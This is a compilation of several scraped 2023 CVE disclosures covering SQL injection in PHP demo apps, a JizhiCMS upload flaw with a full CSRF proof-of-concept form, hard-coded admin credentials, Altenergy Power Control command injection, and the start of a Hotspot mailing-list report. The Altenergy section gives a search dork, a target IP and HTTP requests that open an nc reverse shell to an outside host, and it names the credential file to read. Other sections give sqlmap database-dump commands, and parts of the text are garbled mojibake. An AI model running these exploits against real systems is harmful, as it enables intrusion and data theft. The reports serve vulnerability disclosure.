Art Gallery Management System v1.0 was discovered to contain a SQL injection vulnerability via the viewid parameter on the enquiry page.

\> \[Suggested description\] > Art Gallery Management System v1.0 was discovered to contain a SQL > injection vulnerability via the viewid parameter on the enquiry page. > > ------------------------------------------ > > \[Additional Information\] > Step To Reproduce: > > 1. navigate to the admin login page and login with the valid username and password<admin : Test@123>. > URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php > > 2. Now navigate "ANSWER ENQUIRY" by clicking on the "ENQUIRY" option on the left sidebar. > > 3. Now click on any of the Product "View Details" buttons and you will redirect to the datail page. > > 4. Now insert a single quote ( ' ) on "viewid" parameter to break the database query, you will see the output is not shown. > > 5. Now inject the payload double single quote ('') in the "viewid" parameter to merge the > database query and after sending this request the SQL query is successfully performed and the product is shown in the output. > > 6. For fetching the data from database we use the "sqlmap" tool. > > 7. Now intercept the request of below url and copy the request by click on "copy to file" option on right click and save this as "requests.txt" name. > URL: http://localhost/Art-Gallery-MS-PHP/admin/view-enquiry-detail.php?viewid=1 > > 8. Now to get current database data to use the below "sqlmap" command. > Command: sqlmap -r requests.txt --random-agent -p editid --current-db --risk=3 --level=3 --batch > > 9. Now get all data of the database using the below "sqlmap" command. > Command: sqlmap -r requests.txt --random-agent -p editid --dump --risk=3 --level=3 --dbms=mysql --batch > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project in PHP - Art Gallery Management System Project in PHP - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/admin/view-enquiry-detail.php?viewid=1 > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. an attacker can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information. > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures. > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts. > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server. > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-24726.

CVE-2023-24726: CVE/CVE-2023-24726.txt at main · rahulpatwari/CVE

Simple Customer Relationship Management System v1.0 as discovered to contain a SQL injection vulnerability via the address parameter in the user profile update function.

\> \[Suggested description\] > Simple Customer Relationship Management System v1.0 as discovered to > contain a SQL injection vulnerability via the address parameter in the > user profile update function. > > ------------------------------------------ > > \[Additional Information\] > Steps-To-Reproduce: > 1. Now register a new user by navigating the below URL. > URL: http://localhost/php-scrm/registration.php > 2. Now login user with the valid user credential. > URL: http://localhost/php-scrm/login.php > 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php > 4. Now fill out your profile form then intercept the request in the burp suite. > 5. Now send the burp suite intercepted request into the burp repeater and insert single qoute after address value to breake the query and send the request.. > Payload: address' > 6. In the response you will see the error is shown from Sql. > 7. Now insert the single quote again to merge the query and send the request.. > Payload: address'' > 8. Now right-click and click on copy to file option on intercepted request and create a file request.txt > 9. Now fetch current databases by sqlmap. > Command: sqlmap -r request.txt -p address --current-db --batch > 10. Now dump all data by sqlmap. > Command: sqlmap -r request.txt -p address --dump --batch > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://www.sourcecodester.com > > ------------------------------------------ > > \[Affected Product Code Base\] > Simple Customer Relationship Management (CRM) System - v 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/php-scrm/profile.php > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. an attacker can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information. > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures. > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts. > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server. > > ------------------------------------------ > > \[Reference\] > https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html > https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-24729.

CVE-2023-24729: CVE/CVE-2023-24729.txt at main · rahulpatwari/CVE

A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/user/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223111.

CVE-2023-1407

An arbitrary file upload vulnerability in the \admin\c\CommonController.php component of Jizhicms v2.4.5 allows attackers to execute arbitrary code via a crafted phtml file.

The file upload vulnerability file address:  
\\app\\admin\\c\\CommonController.php  
It can be seen that uploads uses the blacklist and whitelist verification method for the suffix of uploaded files, but the blacklist lacks the restriction on the suffix phtml, which causes the file upload suffix to be bypassed  
For users who have logged in to the background, you can add a phtml to the file suffix in the whitelist, and then you can upload a sentence of the suffix phtml Trojan Horse  

  
Visible file uploaded successfully and returned to the upload path  
  
Repair method:Blacklist phtml files

The CSRF vulnerability ：  
After the administrator logged in, open the following page phtml will be included in the white list, and other configuration items can also be modified

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
          <input type="hidden" name="web&#95;name" value="�&#158;&#129;�&#135;&#180;CMS�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
          <input type="hidden" name="web&#95;keyword" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;&#44;cms&#44;�&#188;&#128;�&#144;cms&#44;�&#133;&#141;�&#180;&#185;cms&#44;cms�&#179;&#187;�&#187;&#159;&#44;phpcms&#44;�&#133;&#141;�&#180;&#185;�&#188;&#129;�&#184;&#154;�&#187;��&#171;&#153;&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#188;&#129;�&#184;&#154;cms&#44;jizhicms&#44;�&#158;&#129;�&#135;&#180;cms&#44;�&#187;��&#171;&#153;cms&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#158;&#129;�&#135;&#180;�&#141;&#154;�&#174;&#162;&#44;�&#158;&#129;�&#135;&#180;blog&#44;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;" />
          <input type="hidden" name="web&#95;desc" value="�&#158;&#129;�&#135;&#180;CMS�&#152;&#175;�&#188;&#128;�&#144;�&#133;&#141;�&#180;&#185;�&#154;&#132;PHPCMS�&#189;&#145;�&#171;&#153;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;�&#188;&#140;�&#151;&#160;�&#149;&#134;�&#184;&#154;�&#142;&#136;�&#157;&#131;�&#188;&#140;�&#174;&#128;�&#141;&#149;�&#152;&#147;�&#148;&#168;�&#188;&#140;�&#143;&#144;�&#190;&#155;�&#184;&#176;�&#175;&#140;�&#154;&#132;�&#143;&#146;�&#187;&#182;�&#188;&#140;�&#184;&#174;�&#130;&#168;�&#174;&#158;�&#142;&#176;�&#155;&#182;�&#159;��&#161;&#128;�&#144;&#173;�&#187;��&#184;&#141;�&#144;&#140;�&#177;&#187;�&#158;&#139;�&#189;&#145;�&#171;&#153;�&#188;&#136;�&#188;&#129;�&#184;&#154;�&#171;&#153;�&#188;&#140;�&#151;&#168;�&#136;&#183;�&#171;&#153;�&#188;&#140;�&#184;�人�&#141;&#154;�&#174;&#162;�&#171;&#153;�&#173;&#137;�&#188;&#137;�&#188;&#140;�&#152;&#175;�&#130;&#168;�&#187;��&#171;&#153;�&#154;&#132;�&#165;&#189;�&#184;&#174;�&#137;&#139;�&#128;&#130;�&#158;&#129;�&#128;&#159;�&#187;��&#171;&#153;�&#188;&#140;�&#176;&#177;�&#128;&#137;�&#158;&#129;�&#135;&#180;CMS�&#128;&#130;" />
          <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" />
          <input type="hidden" name="web&#95;beian" value="�&#134;&#128;ICP�&#164;&#135;88888�&#143;&#183;" />
          <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" />
          <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" />
          <input type="hidden" name="web&#95;qq" value="12345678" />
          <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" />
          <input type="hidden" name="web&#95;address" value="�&#178;&#179;�&#140;&#151;�&#156;&#129;�&#187;&#138;�&#157;&#138;�&#184;&#130;�&#185;&#191;�&#152;&#179;�&#140;�xxx�&#164;&#167;�&#142;&#166;xx�&#165;&#188;001�&#143;&#183;" />
          <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" />
          <input type="hidden" name="file" value="" />
          <input type="hidden" name="domain" value="" />
          <input type="hidden" name="mingan" value="" />
          <input type="hidden" name="closeweb" value="0" />
          <input type="hidden" name="closetip" value="�&#138;&#177;�&#173;&#137;�&#188;&#129;�&#175;&#165;�&#171;&#153;�&#130;&#185;�&#183;&#178;�&#187;&#143;�&#162;&#171;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#129;&#156;�&#173;&#162;�&#191;&#144;�&#161;&#140;�&#188;&#140;�&#175;&#183;�&#129;&#148;�&#179;&#187;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#134;�&#167;&#163;�&#175;&#166;�&#131;&#133;�&#188;&#129;" />
          <input type="hidden" name="web&#95;phone" value="0" />
          <input type="hidden" name="web&#95;weixin" value="" />
          <input type="hidden" name="pc&#95;template" value="cms" />
          <input type="hidden" name="wap&#95;template" value="cms" />
          <input type="hidden" name="weixin&#95;template" value="cms" />
          <input type="hidden" name="iswap" value="1" />
          <input type="hidden" name="isopenhomeupload" value="1" />
          <input type="hidden" name="isopenhomepower" value="0" />
          <input type="hidden" name="cache&#95;time" value="0" />
          <input type="hidden" name="fileSize" value="0" />
          <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" />
          <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#44;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" />
          <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" />
          <input type="hidden" name="classtypemaxlevel" value="0" />
          <input type="hidden" name="onlyuserupload" value="1" />
          <input type="hidden" name="imagequlity" value="75" />
          <input type="hidden" name="ispngcompress" value="0" />
          <input type="hidden" name="admintpl" value="default" />
          <input type="hidden" name="islevelurl" value="0" />
          <input type="hidden" name="iscachepage" value="1" />
          <input type="hidden" name="isautohtml" value="0" />
          <input type="hidden" name="pc&#95;html" value="&#47;" />
          <input type="hidden" name="mobile&#95;html" value="m" />
          <input type="hidden" name="autocheckmessage" value="0" />
          <input type="hidden" name="autocheckcomment" value="1" />
          <input type="hidden" name="iswatermark" value="0" />
          <input type="hidden" name="watermark&#95;file" value="" />
          <input type="hidden" name="watermark&#95;t" value="9" />
          <input type="hidden" name="watermark&#95;tm" value="0" />
          <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
          <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
          <input type="hidden" name="isajax" value="0" />
          <input type="hidden" name="isregister" value="1" />
          <input type="hidden" name="onlyinvite" value="0" />
          <input type="hidden" name="release&#95;table" value="article&#124;product" />
          <input type="hidden" name="closehomevercode" value="0" />
          <input type="hidden" name="closeadminvercode" value="0" />
          <input type="hidden" name="tag&#95;table" value="article&#124;product" />
          <input type="hidden" name="isdebug" value="1" />
          <input type="hidden" name="closesession" value="0" />
          <input type="hidden" name="messageyzm" value="1" />
          <input type="hidden" name="homerelease" value="1" />
          <input type="hidden" name="hideclasspath" value="0" />
          <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" />
          <input type="hidden" name="cachefilenum" value="100" />
          <input type="hidden" name="search&#95;table" value="article&#124;product" />
          <input type="hidden" name="search&#95;words" value="title" />
          <input type="hidden" name="search&#95;words&#95;muti" value="title" />
          <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" />
          <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" />
          <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" />
          <input type="hidden" name="email&#95;port" value="465" />
          <input type="hidden" name="shou&#95;email" value="" />
          <input type="hidden" name="send&#95;email" value="" />
          <input type="hidden" name="send&#95;pass" value="" />
          <input type="hidden" name="send&#95;name" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
          <input type="hidden" name="tj&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#187;&#143;�&#148;&#182;�&#136;&#176;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#129;�&#175;&#183;�&#149;&#153;�&#132;&#143;�&#130;&#168;�&#154;&#132;�&#148;��&#173;&#144;�&#130;&#174;�&#187;&#182;�&#187;&#165;�&#142;&#183;�&#190;&#151;�&#156;&#128;�&#150;&#176;�&#182;&#136;�&#129;&#175;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#188;&#129;" />
          <input type="hidden" name="send&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#161;&#174;�&#174;&#164;�&#134;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#140;�&#175;&#183;�&#142;3�&#151;&#165;�&#134;&#133;�&#177;&#135;�&#172;&#190;�&#188;&#140;�&#128;&#190;�&#156;&#159;�&#129;&#149;�&#184;&#141;�&#191;&#157;�&#149;&#153;�&#188;&#140;�&#184;&#141;�&#190;&#191;�&#175;&#183;�&#167;&#129;�&#176;&#133;�&#128;&#130;�&#177;&#135;�&#172;&#190;�&#174;&#140;�&#136;&#144;�&#144;&#142;�&#188;&#140;�&#131;&#166;�&#175;&#183;�&#145;&#138;�&#159;&#165;�&#174;&#162;�&#156;&#141;人�&#145;&#152;�&#130;&#168;�&#154;&#132;�&#164;�&#152;&#147;�&#180;&#166;�&#143;&#183;�&#144;&#142;�&#148;�&#189;&#141;�&#188;&#140;�&#141;&#179;�&#174;&#140;�&#136;&#144;�&#184;&#139;�&#141;&#149;�&#137;&#139;�&#187;&#173;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#128;&#130;" />
          <input type="hidden" name="yunfei" value="0&#46;00" />
          <input type="hidden" name="overtime" value="4" />
          <input type="hidden" name="isopenemail" value="1" />
          <input type="hidden" name="paytype" value="0" />
          <input type="hidden" name="alipay&#95;partner" value="" />
          <input type="hidden" name="alipay&#95;key" value="" />
          <input type="hidden" name="alipay&#95;private&#95;key" value="" />
          <input type="hidden" name="alipay&#95;public&#95;key" value="" />
          <input type="hidden" name="wx&#95;mchid" value="" />
          <input type="hidden" name="wx&#95;key" value="" />
          <input type="hidden" name="wx&#95;appid" value="" />
          <input type="hidden" name="wx&#95;appsecret" value="" />
          <input type="hidden" name="wx&#95;client&#95;cert" value="" />
          <input type="hidden" name="wx&#95;client&#95;key" value="" />
          <input type="hidden" name="wx&#95;token" value="" />
          <input type="hidden" name="money&#95;exchange" value="1" />
          <input type="hidden" name="jifen&#95;exchange" value="100" />
          <input type="hidden" name="isopenjifen" value="1" />
          <input type="hidden" name="isopenqianbao" value="1" />
          <input type="hidden" name="isopenweixin" value="1" />
          <input type="hidden" name="isopenzfb" value="1" />
          <input type="hidden" name="isopendmf" value="1" />
          <input type="hidden" name="wx&#95;login&#95;appid" value="" />
          <input type="hidden" name="wx&#95;login&#95;appsecret" value="" />
          <input type="hidden" name="wx&#95;login&#95;token" value="" />
          <input type="hidden" name="huanying" value="�&#172;&#162;�&#191;&#142;�&#133;&#179;�&#179;&#168;�&#133;&#172;�&#188;&#151;�&#143;&#183;&#126;" />
          <input type="hidden" name="login&#95;award" value="1" />
          <input type="hidden" name="login&#95;award&#95;open" value="1" />
          <input type="hidden" name="release&#95;award&#95;open" value="1" />
          <input type="hidden" name="release&#95;award" value="1" />
          <input type="hidden" name="release&#95;max&#95;award" value="0" />
          <input type="hidden" name="collect&#95;award&#95;open" value="1" />
          <input type="hidden" name="collect&#95;award" value="1" />
          <input type="hidden" name="collect&#95;max&#95;award" value="1000" />
          <input type="hidden" name="likes&#95;award&#95;open" value="1" />
          <input type="hidden" name="likes&#95;award" value="1" />
          <input type="hidden" name="likes&#95;max&#95;award" value="1000" />
          <input type="hidden" name="comment&#95;award&#95;open" value="1" />
          <input type="hidden" name="comment&#95;award" value="1" />
          <input type="hidden" name="comment&#95;max&#95;award" value="1000" />
          <input type="hidden" name="follow&#95;award&#95;open" value="1" />
          <input type="hidden" name="follow&#95;award" value="1" />
          <input type="hidden" name="follow&#95;max&#95;award" value="1000" />
          <input type="hidden" name="invite&#95;award&#95;open" value="0" />
          <input type="hidden" name="invite&#95;type" value="jifen" />
          <input type="hidden" name="invite&#95;award" value="0" />
          <input type="hidden" name="custom&#95;type" value="0" />
          <input type="hidden" name="custom&#95;title" value="" />
          <input type="hidden" name="custom&#95;fields" value="" />
          <input type="hidden" name="custom&#95;ctype" value="1" />
          <input type="hidden" name="custom&#95;tips" value="" />
          <input type="hidden" name="custom&#95;config" value="" />
          <input type="hidden" name="custom&#95;new&#95;title" value="" />
          <input type="hidden" name="custom&#95;new&#95;fields" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

CVE-2023-27235: jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability · Issue #85 · Cherry-toto/jizhicms

A Hard Coded Admin Credentials issue in the Web-UI Admin Panel in Propius MachineSelector 6.6.0 and 6.6.1 allows remote attackers to gain access to the admin panel Propiusadmin.php, which allows taking control of the affected system.

**MachineSelector security notes and vulnerability**

Version

CVE-ID

Impact

Temporary Fix

Remediation

6.6.0, 6.6.1

CVE-2023-26511

Propius Machine Selector from 6.6.0 to 6.6.1. Affected versions contain a Propiusadmin.php file which allows a remote attacker with knowledge of the hardcoded password to gain access to the admin panel. A remote attacker can use the hardcoded credentials to fully take control over the vulnerable system via the exposed admin panel.

Delete "Propiusadmin.php" file

Update to newest Version, at least V6.6.2

*   Back
*   Report issue

CVE-2023-26511: Propius GmbH

OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.

Permalink

Cannot retrieve contributors at this time

**title : OS command injection affects "Altenergy Power Control Software"****SW ver : C1.2.5****Vendor : https://apsystems.com/****Google Dork : intitle:"Altenergy Power Control Software"****Affected device : ENERGY COMMUNICATION UNIT**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

   public function set\_timezone()
    {
        $results = array();

        //ΦÄ╖σÅûΘí╡Θ¥óΘÇëµï⌐τÜäµù╢σî║
        $timezone = $this\->input\->post('timezone');
        if(strlen($timezone) == 0)
                $timezone = "Asia/Taipei";

        //Φ«╛τ╜«linuxτ│╗τ╗ƒµù╢σî║
        $cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
        system($cmd);

        //σ░åµù╢σî║Σ┐¥σ¡ÿσê░Θàìτ╜«µûçΣ╗╢
        $fp = @fopen("/etc/yuneng/timezone.conf",'w');
        if($fp){
            fwrite($fp, $timezone);
            fclose($fp);
        }

**Exploit :**

HTTP request :

    POST /index.php/management/set_timezone HTTP/1.1
    Host: 78.218.230.32:8081
    Content-Length: 33
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://78.218.230.32:8081
    Referer: http://78.218.230.32:8081/index.php/management/datetime
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    timezone=`mknod /tmp/backpipe p `
    

HTTP request :

    POST /index.php/management/set_timezone HTTP/1.1
    Host: 78.218.230.32:8081
    Content-Length: 73
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://78.218.230.32:8081
    Referer: http://78.218.230.32:8081/index.php/management/datetime
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    timezone=`/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`
    
    

POC :

\*\* note \*\*

*   please use the following command after getting shell to avoid distorying the WEBUI.  
    "echo Asia/Taipei > /etc/yuneng/timezone.conf"

**Important files to check :**

*   /etc/yuneng/passwd.conf this file contains the credentials for the WebUI.

CVE-2023-28343: Disclosures/os_command_injection.md at main · ahmedalroky/Disclosures

KDAB Hotspot 1.3.x and 1.4.x through 1.4.1, in a non-default configuration, allows privilege escalation because of race conditions involving symlinks and elevate_perf_privileges.sh chown calls.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 14 Mar 2023 12:41:21 +0100
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: Security issue in Hotspot elevate\_perf\_privileges.sh (CVE-2023-28144)

Hello list,

this report is about a possible security vulnerability I found in the Hotspot
\[1\] project.

An openSUSE packager for hotspot requested a review of a Hotspot update to
version 1.4.1. This version contained a newly added D-Bus helper and Polkit
authentication. During the review I found a vulnerability in the helper script
\`elevate\_perf\_privileges.sh\` that is likely not exploitable by default, but
could easily become a local root exploit when Polkit configuration is changed
or an alternative authentication mechanism with weak authentication
requirements is used.

\[1\]: https://github.com/KDAB/hotspot.git
\[2\]: https://bugzilla.suse.com/show\_bug.cgi?id=1208808

Introduction
============

Hotspot is a GUI application for doing performance profiling anylsis
based on Linux performance counters. This report is about the v1.4.1 version
tag in the upstream repository.

The Issue
=========

Hotspot temporarily changes Linux Kernel sysctl settings and permissions of
the \`debugfs\` and \`tracefs\` file systems to allow running the GUI application
as unprivileged users. The issue is related to privilege escalation logic
which is carried out by the \`elevate\_perf\_privileges.sh\` script. This script
is invoked as root via a range of potential mechanisms like pkexec, kdesu or a
D-Bus based KDE kauth authentication helper. The mechanism is selected during
runtime with a prioritization of kauth > pkexec > kdesudo > kdesu.
